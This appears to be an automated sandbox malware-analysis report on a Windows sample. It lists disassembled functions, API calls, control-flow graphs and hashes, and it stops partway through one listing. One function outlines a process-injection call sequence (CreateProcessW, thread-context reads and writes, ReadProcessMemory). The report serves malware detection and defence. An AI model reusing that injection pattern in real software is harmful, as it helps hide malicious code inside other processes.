                                                                                      Function 00C13B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 738 c13b1c-c13b27 739 c13b99-c13b9b 738->739 740 c13b29-c13b2e 738->740 742 c13b8c-c13b8f 739->742 740->739 741 c13b30-c13b48 RegOpenKeyExW 740->741 741->739 743 c13b4a-c13b69 RegQueryValueExW 741->743 744 c13b80-c13b8b RegCloseKey 743->744 745 c13b6b-c13b76 743->745 744->742 746 c13b90-c13b97 745->746 747 c13b78-c13b7a 745->747 748 c13b7e 746->748 747->748 748->744
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00C13B0F,SwapMouseButtons,00000004,?), ref: 00C13B40
                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00C13B0F,SwapMouseButtons,00000004,?), ref: 00C13B61
                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00C13B0F,SwapMouseButtons,00000004,?), ref: 00C13B83
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Control Panel\Mouse
                                                                                      • API String ID: 3677997916-824357125
                                                                                      • Opcode ID: 4428a9c7172f713559f41ab369e4d79d6479e0a584d309a084dbf5b453deedfe
                                                                                      • Instruction ID: e54e318c08de62905dd884eedb3853afc9dd9e293f29e7bae4cf01f05654693b
                                                                                      • Opcode Fuzzy Hash: 4428a9c7172f713559f41ab369e4d79d6479e0a584d309a084dbf5b453deedfe
                                                                                      • Instruction Fuzzy Hash: C6112AB5514248FFDB208FA5DC84AEFB7B8EF06748B104459A805D7110E2319F80A760
                                                                                      Function 014E0BB0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 749 14e0bb0-14e0c50 call 14e3020 * 3 756 14e0c67 749->756 757 14e0c52-14e0c5c 749->757 759 14e0c6e-14e0c77 756->759 757->756 758 14e0c5e-14e0c65 757->758 758->759 760 14e0c7e-14e1330 759->760 761 14e1332-14e1336 760->761 762 14e1343-14e1370 CreateProcessW 760->762 763 14e137c-14e13a9 761->763 764 14e1338-14e133c 761->764 768 14e137a 762->768 769 14e1372-14e1375 762->769 784 14e13ab-14e13ae 763->784 785 14e13b3 763->785 765 14e133e 764->765 766 14e13b5-14e13e2 764->766 771 14e13ec-14e1406 Wow64GetThreadContext 765->771 766->771 791 14e13e4-14e13e7 766->791 768->771 772 14e1771-14e1773 769->772 774 14e140d-14e1428 ReadProcessMemory 771->774 775 14e1408 771->775 776 14e142f-14e1438 774->776 777 14e142a 774->777 779 14e171a-14e171e 775->779 782 14e143a-14e1449 776->782 783 14e1461-14e1480 call 14e26a0 776->783 777->779 780 14e176f 779->780 781 14e1720-14e1724 779->781 780->772 787 14e1739-14e173d 781->787 788 14e1726-14e1732 781->788 782->783 789 14e144b-14e145a call 14e25f0 782->789 800 14e1487-14e14aa call 14e27e0 783->800 801 14e1482 783->801 784->772 785->771 793 14e173f-14e1742 787->793 794 14e1749-14e174d 787->794 788->787 789->783 802 14e145c 789->802 791->771 791->772 793->794 798 14e174f-14e1752 794->798 799 14e1759-14e175d 794->799 798->799 803 14e175f-14e1765 call 14e25f0 799->803 804 14e176a-14e176d 799->804 808 14e14ac-14e14b3 800->808 809 14e14f4-14e1515 call 14e27e0 800->809 801->779 802->779 803->804 804->772 810 14e14ef 808->810 811 14e14b5-14e14e6 call 14e27e0 808->811 816 14e151c-14e153a call 14e3040 809->816 817 14e1517 809->817 810->779 818 14e14ed 811->818 819 14e14e8 811->819 822 14e1545-14e154f 816->822 817->779 818->809 819->779 823 14e1585-14e1589 822->823 824 14e1551-14e1583 call 14e3040 822->824 826 14e158f-14e159f 823->826 827 14e1674-14e1691 call 14e21f0 823->827 824->822 826->827 829 14e15a5-14e15b5 826->829 834 14e1698-14e16b7 Wow64SetThreadContext 827->834 835 14e1693 827->835 829->827 833 14e15bb-14e15df 829->833 836 14e15e2-14e15e6 833->836 837 14e16bb-14e16c6 call 14e2520 834->837 838 14e16b9 834->838 835->779 836->827 839 14e15ec-14e1601 836->839 845 14e16ca-14e16ce 837->845 846 14e16c8 837->846 838->779 841 14e1615-14e1619 839->841 843 14e161b-14e1627 841->843 844 14e1657-14e166f 841->844 847 14e1629-14e1653 843->847 848 14e1655 843->848 844->836 849 14e16da-14e16de 845->849 850 14e16d0-14e16d3 845->850 846->779 847->848 848->841 852 14e16ea-14e16ee 849->852 853 14e16e0-14e16e3 849->853 850->849 854 14e16fa-14e16fe 852->854 855 14e16f0-14e16f3 852->855 853->852 856 14e170b-14e1714 854->856 857 14e1700-14e1706 call 14e25f0 854->857 855->854 856->760 856->779 857->856
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 014E136B
                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014E1401
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014E1423
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043178485.00000000014DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DF000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_14df000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 2438371351-0
                                                                                      • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                                      • Instruction ID: 53d557651ed933045c4f4c78003aa7676d39f4e00fe8a0da0268e392327f4bbd
                                                                                      • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                                      • Instruction Fuzzy Hash: 9C623B30A54258DBEB24CFA4C844BDEB376EF58701F1091A9D20DEB3A0E7759E81CB59
                                                                                      Function 00C1DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Variable must be of type 'Object'., xrefs: 00C632B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Variable must be of type 'Object'.
                                                                                      • API String ID: 0-109567571
                                                                                      • Opcode ID: 25237da4c43350128c5bd52d63e1edad9245ecf3c35aaeca322f0676d6ab7382
                                                                                      • Instruction ID: 7da0abfe605f0f084025cb4b4cfe46cca7c70a30b66b9f3f026f540c2d0f9ba8
                                                                                      • Opcode Fuzzy Hash: 25237da4c43350128c5bd52d63e1edad9245ecf3c35aaeca322f0676d6ab7382
                                                                                      • Instruction Fuzzy Hash: A0C27071A00215CFDB24CF59C880BADB7B1BF0A310F248569ED56AB391D375EE82EB51
                                                                                      Function 00C13923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1369 c13923-c13939 1370 c13a13-c13a17 1369->1370 1371 c1393f-c13954 call c16270 1369->1371 1374 c53393-c533a2 LoadStringW 1371->1374 1375 c1395a-c13976 call c16b57 1371->1375 1377 c533ad-c533b6 1374->1377 1381 c533c9-c533e5 call c16350 call c13fcf 1375->1381 1382 c1397c-c13980 1375->1382 1379 c13994-c13a0e call c32340 call c13a18 call c34983 Shell_NotifyIconW call c1988f 1377->1379 1380 c533bc-c533c4 call c1a8c7 1377->1380 1379->1370 1380->1379 1381->1379 1395 c533eb-c53409 call c133c6 call c13fcf call c133c6 1381->1395 1382->1377 1384 c13986-c1398f call c16350 1382->1384 1384->1379 1395->1379
                                                                                      APIs
                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C533A2
                                                                                        • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C13A04
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                                      • String ID: Line:
                                                                                      • API String ID: 2289894680-1585850449
                                                                                      • Opcode ID: 54a9afaa60c88d3bd8fd072d159031c8603ee68129b03e2b243dbab99ade9b10
                                                                                      • Instruction ID: 202999eec10112e3722dd0046e4c040657baebdadd9527c5fb9dc0e535ad1169
                                                                                      • Opcode Fuzzy Hash: 54a9afaa60c88d3bd8fd072d159031c8603ee68129b03e2b243dbab99ade9b10
                                                                                      • Instruction Fuzzy Hash: D931F471408380AAC321EB20DC45BEFB7D8AF46714F04052AF9A9930A1DB709799E7C2
                                                                                      Function 00C2FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00C30668
                                                                                        • Part of subcall function 00C332A4: RaiseException.KERNEL32(?,?,?,00C3068A,?,00CE1444,?,?,?,?,?,?,00C3068A,00C11129,00CD8738,00C11129), ref: 00C33304
                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00C30685
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                      • String ID: Unknown exception
                                                                                      • API String ID: 3476068407-410509341
                                                                                      • Opcode ID: e0da451bdfc01eeaa9a2610bf5ef77a12ea024720d51d24bd415791d1045c4ce
                                                                                      • Instruction ID: f9ad7160a77ac0d975ef6911af2f38b09e0c2e160a441f63e1f4e2a7f52f226c
                                                                                      • Opcode Fuzzy Hash: e0da451bdfc01eeaa9a2610bf5ef77a12ea024720d51d24bd415791d1045c4ce
                                                                                      • Instruction Fuzzy Hash: 0EF0CD3591020DB7CB00BAA9E856C9E7B7C9E00310F704536B924D6996EF71EB6ADA90
                                                                                      Function 00C97F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C982F5
                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00C982FC
                                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00C984DD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 146820519-0
                                                                                      • Opcode ID: 029f677f4f43a543e42a633106d7d91e345d1273722a7894a25e2f6ed127a6bc
                                                                                      • Instruction ID: bedad964b19eb332fd981f9b2fb6ea5268522afc49d86ba49fd41fbfa3cc9dfa
                                                                                      • Opcode Fuzzy Hash: 029f677f4f43a543e42a633106d7d91e345d1273722a7894a25e2f6ed127a6bc
                                                                                      • Instruction Fuzzy Hash: 43126C719083019FDB14DF28C494B6ABBE5FF86318F14895DE8998B352CB31E949CF92
                                                                                      Function 00C110F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C11BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C11BF4
                                                                                        • Part of subcall function 00C11BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C11BFC
                                                                                        • Part of subcall function 00C11BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C11C07
                                                                                        • Part of subcall function 00C11BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C11C12
                                                                                        • Part of subcall function 00C11BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C11C1A
                                                                                        • Part of subcall function 00C11BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C11C22
                                                                                        • Part of subcall function 00C11B4A: RegisterWindowMessageW.USER32(00000004,?,00C112C4), ref: 00C11BA2
                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C1136A
                                                                                      • OleInitialize.OLE32 ref: 00C11388
                                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00C524AB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1986988660-0
                                                                                      • Opcode ID: 47bda291ac815819c020e2009c0e30362958031b1f05b03487b99dc08fc7ab70
                                                                                      • Instruction ID: fc474dc0ef742d7fb5baeb16b23db9011aaea6c49752990738dbd2d1299ed5d2
                                                                                      • Opcode Fuzzy Hash: 47bda291ac815819c020e2009c0e30362958031b1f05b03487b99dc08fc7ab70
                                                                                      • Instruction Fuzzy Hash: 8271BEB49023C08EC794DF7AA8C579D3AE4FB8935475D812ADC1ACB3A1EB3444A1DF41
                                                                                      Function 00C486AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,00C485CC,?,00CD8CC8,0000000C), ref: 00C48704
                                                                                      • GetLastError.KERNEL32(?,00C485CC,?,00CD8CC8,0000000C), ref: 00C4870E
                                                                                      • __dosmaperr.LIBCMT ref: 00C48739
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                      • String ID:
                                                                                      • API String ID: 2583163307-0
                                                                                      • Opcode ID: 375b93e25a6b703c2776738894e5e3dcee0c766c239baaf777e0eb4359ef7af4
                                                                                      • Instruction ID: b26e2f88c076a3347e4d52ad880a107502cb51cd85bd1981d4b343f0c81cb6ef
                                                                                      • Opcode Fuzzy Hash: 375b93e25a6b703c2776738894e5e3dcee0c766c239baaf777e0eb4359ef7af4
                                                                                      • Instruction Fuzzy Hash: 9C016D33A0566027D6A56734A885BFE77497B82B78F3A011DFC288F1E3DEB1CD859190
                                                                                      Function 00C21310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __Init_thread_footer.LIBCMT ref: 00C217F6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Init_thread_footer
                                                                                      • String ID: CALL
                                                                                      • API String ID: 1385522511-4196123274
                                                                                      • Opcode ID: 37d134b7539ef6b2080d2227d46b29ca91fb65122ed5a89976fb1e8371881873
                                                                                      • Instruction ID: 6d7006eb2a0b5f8b9113805a3ad949e9ec53b76c2c948e55d1779e5e2f368381
                                                                                      • Opcode Fuzzy Hash: 37d134b7539ef6b2080d2227d46b29ca91fb65122ed5a89976fb1e8371881873
                                                                                      • Instruction Fuzzy Hash: 6822CB706083519FC724DF15D480B2ABBF1BF95314F28896DF89A8B7A2D731E941DB82
                                                                                      Function 00C12DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00C52C8C
                                                                                        • Part of subcall function 00C13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C13A97,?,?,00C12E7F,?,?,?,00000000), ref: 00C13AC2
                                                                                        • Part of subcall function 00C12DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C12DC4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                      • String ID: X
                                                                                      • API String ID: 779396738-3081909835
                                                                                      • Opcode ID: 112ee4e29090af4ae7f986d891caa523b0dfc204c57f7261f92e2a804478a6b8
                                                                                      • Instruction ID: 7f55a86e3104a6232dceb9939514fc045fb130b1c26d3795573e90d29bace94b
                                                                                      • Opcode Fuzzy Hash: 112ee4e29090af4ae7f986d891caa523b0dfc204c57f7261f92e2a804478a6b8
                                                                                      • Instruction Fuzzy Hash: 6421C670A002989BDF41DF94C8457EE7BF89F4A305F00405AE505A7341DBB45689EF61
                                                                                      Function 00C13837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C13908
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconNotifyShell_
                                                                                      • String ID:
                                                                                      • API String ID: 1144537725-0
                                                                                      • Opcode ID: 4b80f5e8fb86e5ac8130dab4a8331028eeb5136f8268e6ea93ca42c4b80ac650
                                                                                      • Instruction ID: 25d87affa4e93d937e67209b199a307d4bf01f4e4606dc42664de682d9d818f1
                                                                                      • Opcode Fuzzy Hash: 4b80f5e8fb86e5ac8130dab4a8331028eeb5136f8268e6ea93ca42c4b80ac650
                                                                                      • Instruction Fuzzy Hash: BE31E670504341CFE720DF24D8847DBBBE8FB4A718F04092EF99987290E771AA84DB52
                                                                                      Function 00C15745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00C1949C,?,00008000), ref: 00C15773
                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00C1949C,?,00008000), ref: 00C54052
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: e4c417faa18e41c13e0a995b479d5c743e373546151b2336eb1d6136759f57bf
                                                                                      • Instruction ID: cb8184253ddb915a8c603706a53ca480ec5d1d2c65af3e8dd27f377aa7337b83
                                                                                      • Opcode Fuzzy Hash: e4c417faa18e41c13e0a995b479d5c743e373546151b2336eb1d6136759f57bf
                                                                                      • Instruction Fuzzy Hash: 86018431245225FAE7310A26CC0EF9B7F54DF42774F108200BB6C5A1E0CBB45594DBD0
                                                                                      Function 00C1B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __Init_thread_footer.LIBCMT ref: 00C1BB4E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Init_thread_footer
                                                                                      • String ID:
                                                                                      • API String ID: 1385522511-0
                                                                                      • Opcode ID: 88b5f6e0a06c0efb4a998ba6ed8460b028bd00faf55c8f96d8b0db75691bc1be
                                                                                      • Instruction ID: 785b17ffded4520e9ad731b36da90a9a2c1db442cb009d7da7fcfe5bc8f6e441
                                                                                      • Opcode Fuzzy Hash: 88b5f6e0a06c0efb4a998ba6ed8460b028bd00faf55c8f96d8b0db75691bc1be
                                                                                      • Instruction Fuzzy Hash: 9D32A174A00209DFDB24CF55C894BBEB7B9EF46304F248059E915AB2A1C774EE81EF91
                                                                                      Function 014E0BAD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
